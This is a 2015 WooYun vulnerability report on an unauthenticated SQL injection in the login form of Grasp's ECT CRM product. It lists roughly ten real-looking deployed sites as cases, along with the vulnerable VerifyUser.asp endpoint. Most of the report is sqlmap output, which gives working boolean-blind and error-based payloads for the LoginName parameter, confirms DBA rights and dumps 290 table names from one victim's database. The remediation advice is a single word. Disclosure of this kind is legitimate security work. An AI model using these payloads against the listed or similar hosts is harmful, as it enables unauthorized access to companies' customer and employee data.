当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105065

漏洞标题:任我行ECT存在SQL注入(无需登录)

相关厂商:grasp.com.cn

漏洞作者: 路人甲

提交时间:2015-04-01 10:57

修复时间:2015-07-05 10:59

公开时间:2015-07-05 10:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开

简要描述:

rt

详细说明:

任我行ECT (企业“管人管事”执行管控工具)
登录框存在post注入。。DBA权限。
案例:

http://120.31.62.218/
http://crm.netzone.com/
http://121.9.201.153/
http://221.10.14.66/zhang/
http://61.184.240.105/crm/
http://crm.ec3s.com/
http://crm.kx8.cn/
http://crm.techray.com.cn/
http://tianzhengtaisheng.3322.org/crm/
http://www.hanna.com.cn:956/


http://crm.netzone.com/VerifyUser.asp

漏洞证明:

aaaaaaaaaa11111111111.jpg


aaaaaaaaaa22222222222222.jpg


aaaaaaaaaaaaaaa33333333333.jpg


aaaaaaaaaaa44444444444.jpg


sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: LoginName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'grasp_crm'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: LoginName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: LoginName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: grasp_crm
[290 tables]
+------------------------------------+
| CRM_Activity |
| CRM_ActivityClassification1 |
| CRM_ActivityClassification2 |
| CRM_ActivityClassification3 |
| CRM_ActivityCoEmployee |
| CRM_ActivityRecord |
| CRM_ActivityStyle |
| CRM_AllCanReport |
| CRM_AllCanReportIndex |
| CRM_AllCanReportUserList |
| CRM_BBS |
| CRM_BBSChannel |
| CRM_BBSVoteDetail |
| CRM_BbsColumn |
| CRM_BbsColumnStyle |
| CRM_BbsNotify |
| CRM_BbsRight |
| CRM_BbsRightTempletDetail |
| CRM_BbsSubscribe |
| CRM_BbsUserInfo |
| CRM_BbsVote |
| CRM_BusinessActivity |
| CRM_BusinessActivityStyle |
| CRM_ChatInfo |
| CRM_ChatOnlineUser |
| CRM_ChatRoomInfo |
| CRM_CoEmail |
| CRM_CoObject |
| CRM_CoObjectRelation |
| CRM_Commodity |
| CRM_CommodityClassification1 |
| CRM_CommodityClassification2 |
| CRM_CommodityClassification3 |
| CRM_CommodityGallery |
| CRM_CompanyContect |
| CRM_ConstDefineCusSetting |
| CRM_ContractClassfication1 |
| CRM_ContractClassfication2 |
| CRM_ContractCoEmployee |
| CRM_ContractManage |
| CRM_ContractRecord |
| CRM_CustomConfig |
| CRM_CustomConfigNew |
| CRM_CustomHtml |
| CRM_CustomImformation |
| CRM_CustomTable1 |
| CRM_CustomTable2 |
| CRM_CustomTable3 |
| CRM_CustomTableCoObject |
| CRM_DataRight |
| CRM_DataSyncMapInfo |
| CRM_DataSyncTaskDetail |
| CRM_DayMotto |
| CRM_Department |
| CRM_DeskTopRecord |
| CRM_DispatchTask |
| CRM_DispatchTaskMsg |
| CRM_DutyCoEmployee |
| CRM_DutyTable |
| CRM_Email |
| CRM_Employee |
| CRM_EmployeeIPConfig |
| CRM_EmployeeStyle |
| CRM_ExMailAddresslist |
| CRM_ExMailSetting |
| CRM_ExPanMailBox |
| CRM_Exam_feedbackshare |
| CRM_ExpanRight |
| CRM_ExpanTableForTree |
| CRM_Favorite |
| CRM_Fee |
| CRM_FeeClassification1 |
| CRM_FeeClassification2 |
| CRM_FeeCoEmployee |
| CRM_FeePlan |
| CRM_FeePlanItem |
| CRM_FeePostil |
| CRM_FeeStyle |
| CRM_Gallery |
| CRM_Help |
| CRM_HelpActivity |
| CRM_IPInfo |
| CRM_InterBatchAddDraft |
| CRM_Interunit |
| CRM_InterunitClassification1 |
| CRM_InterunitClassification2 |
| CRM_InterunitClassification3 |
| CRM_InterunitClassification4 |
| CRM_InterunitClassification5 |
| CRM_InterunitClassification6 |
| CRM_InterunitClassification7 |
| CRM_InterunitClassification8 |
| CRM_InterunitCoShareInfo |
| CRM_InterunitDraftDetial |
| CRM_InterunitGallery |
| CRM_InterunitMap |
| CRM_InterunitSaleTaskMoveLog |
| CRM_InterunitShareInfo |
| CRM_InterunitStyle |
| CRM_InterunitStyleRight |
| CRM_InterunitTel |
| CRM_InterunitTelLog |
| CRM_InterunitTemplet |
| CRM_KpiCoForm |
| CRM_KpiExtraScore |
| CRM_KpiMain |
| CRM_KpiScore |
| CRM_KpiTable |
| CRM_KpiTableCoExaminee |
| CRM_KpiTableCoScoreMan |
| CRM_KpiTableItem |
| CRM_KpiTemplete |
| CRM_KpiTempleteItem |
| CRM_Lable |
| CRM_Limit |
| CRM_LimitTemplet |
| CRM_LimitTempletNew |
| CRM_LinkMan |
| CRM_LinkManClassification1 |
| CRM_LinkManDepartment |
| CRM_LinkManWork |
| CRM_LoginUser |
| CRM_MeetingMessage |
| CRM_MeetingRec |
| CRM_Message |
| CRM_MessageNoRead |
| CRM_MessageUsedReceiver |
| CRM_MobileMsgRecord |
| CRM_MobileMsgTemp |
| CRM_ModifyInterUnit |
| CRM_MsgReceiverGroup |
| CRM_MyConcern |
| CRM_MyImportance |
| CRM_MyInstancy |
| CRM_MyPlan |
| CRM_MyPlanCoEmployee |
| CRM_MyPlanStyle |
| CRM_MySelectCreator |
| CRM_MyTask |
| CRM_MyTaskCoEmployee |
| CRM_MyTaskColKpiDate |
| CRM_MyTaskModifyRecord |
| CRM_MyTaskPostil |
| CRM_MyTaskResualt |
| CRM_MyTaskStyle |
| CRM_MyTaskSummary |
| CRM_MyTaskSummaryPostil |
| CRM_MyTaskView |
| CRM_NewCoMessage |
| CRM_Notepaper |
| CRM_ObjectLable |
| CRM_OnlineUser |
| CRM_OrderForm |
| CRM_OrderFormCoEmployee |
| CRM_PPControl |
| CRM_PopuMsgCenter_Help |
| CRM_PopuMsgCenter_News |
| CRM_PopuMsgCenter_Schedule |
| CRM_PreGetEmail |
| CRM_PreSendCoMail |
| CRM_ProPriceCoEmployee |
| CRM_Project |
| CRM_ProjectClassification1 |
| CRM_ProjectClassification2 |
| CRM_ProjectClassification3 |
| CRM_ProvidePrice |
| CRM_ProvidePriceClassfication |
| CRM_QuickGetNoReadMessage |
| CRM_ReportAuditCoEmployee |
| CRM_RightFunName |
| CRM_RoutineWork |
| CRM_RoutineWorkDetail |
| CRM_RoutineWorkPerson |
| CRM_SMSSigName |
| CRM_SMSmsgGroup |
| CRM_SaleTaskRecord |
| CRM_SalesAssistor |
| CRM_SalesCoCommodity |
| CRM_SalesRegister |
| CRM_SalesRegisterRecord |
| CRM_SalesStatus |
| CRM_SalesTarget |
| CRM_SalesTask |
| CRM_SalesTaskClassification1 |
| CRM_SalesTaskCommerce |
| CRM_SalesTaskComplete |
| CRM_SalesTaskDemand |
| CRM_SalesTaskDetail |
| CRM_SalesTaskGeneral |
| CRM_SalesTaskPostile |
| CRM_SalesTaskQuote |
| CRM_SalesTaskStyle |
| CRM_Schedule |
| CRM_ScheduleCoEmployee |
| CRM_ScheduleCoFee |
| CRM_SchedulePostil |
| CRM_ScheduleType |
| CRM_SerialNumber |
| CRM_Service |
| CRM_ServiceAssistor |
| CRM_ServiceClassification1 |
| CRM_ServiceClassification2 |
| CRM_ServiceClassification3 |
| CRM_ServiceKnowledge |
| CRM_ServiceKnowledgeStyle |
| CRM_ServiceManage |
| CRM_ServiceManageClassification1 |
| CRM_ServiceManageStyle |
| CRM_ServiceNotice |
| CRM_ServiceNoticeClassification1 |
| CRM_ServiceNoticeClassification2 |
| CRM_ServiceNoticeCopyMan |
| CRM_ServiceNoticeType |
| CRM_ServicePostile |
| CRM_ServiceProcess |
| CRM_ServiceProcessClassification1 |
| CRM_ServiceReply |
| CRM_SolarData |
| CRM_SolarMonthData |
| CRM_SummaryForDayTask |
| CRM_SummaryPostil |
| CRM_SystemParameter |
| CRM_TaskCheckViewDetial |
| CRM_Tellist |
| CRM_Template |
| CRM_UploadFile |
| CRM_UserConfig |
| CRM_UserLimitTempletMap |
| CRM_UserLoginInfo |
| Exam_ExamCoExamer |
| Exam_ExamCoTemp |
| Exam_ExamerAnalysis |
| Exam_Fillblank_Key |
| Exam_HXYConfig |
| Exam_HXY_CaseAndConsultationReport |
| Exam_HXY_Interunit1 |
| Exam_HXY_Interunit2 |
| Exam_HXY_Iter_Consu |
| Exam_HXY_Recommendedtraining |
| Exam_InviteRelations |
| Exam_List |
| Exam_LoginUser |
| Exam_MainType |
| Exam_QuestionScore |
| Exam_SubjectItem |
| Exam_SubjectStore |
| Exam_Templet |
| Exam_TempletCoResult |
| Exam_TempletCoResult_Array |
| Exam_TempletCoResult_Fields |
| Exam_TempletCoResult_ShowResults |
| Exam_Templet_BigItem |
| Exam_Templet_SmallItem |
| WF_Copyer |
| WF_Examiner |
| WF_Instance |
| WF_Instance_StepInfo |
| WF_Instance_StepInfoHis |
| WF_Instance_Steps |
| WF_Instance_StepsHis |
| WF_Main |
| WF_MainType |
| WF_NewFields |
| WF_NodeFlow |
| WF_NodeFlow_Condition |
| WF_Nodes |
| WF_UserList |
| WF_Writor |
| dtproperties |
| vInterunitKeySearch |
| vwCRM_Activity |
| vwCRM_BillProductDetail |
| vwCRM_Interunit |
| vwCRM_InterunitAllCoObject |
| vwCRM_InterunitForAll |
| vwCRM_InterunitForLinkman |
| vwCRM_InterunitForTelCall |
| vwCRM_LinkmanDetail |
| vwCRM_SaleTask |
| vwCRM_SaleTaskDetail |
| vwCRM_SaleTaskDetail2 |
| vwCRM_Schedule |
| vwCRM_TeamSummary |
| vwCRM_VirtualProfitSalesRegister |
| vwCRM_VirtualProfitSalesTask |
| vwCRM_WFList |
| vwCRM_interunitForReport |
| vw_LinkmanDefault |
| vw_UserDep |
| vw_UserInterunitStyle |
+------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-05 10:59

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无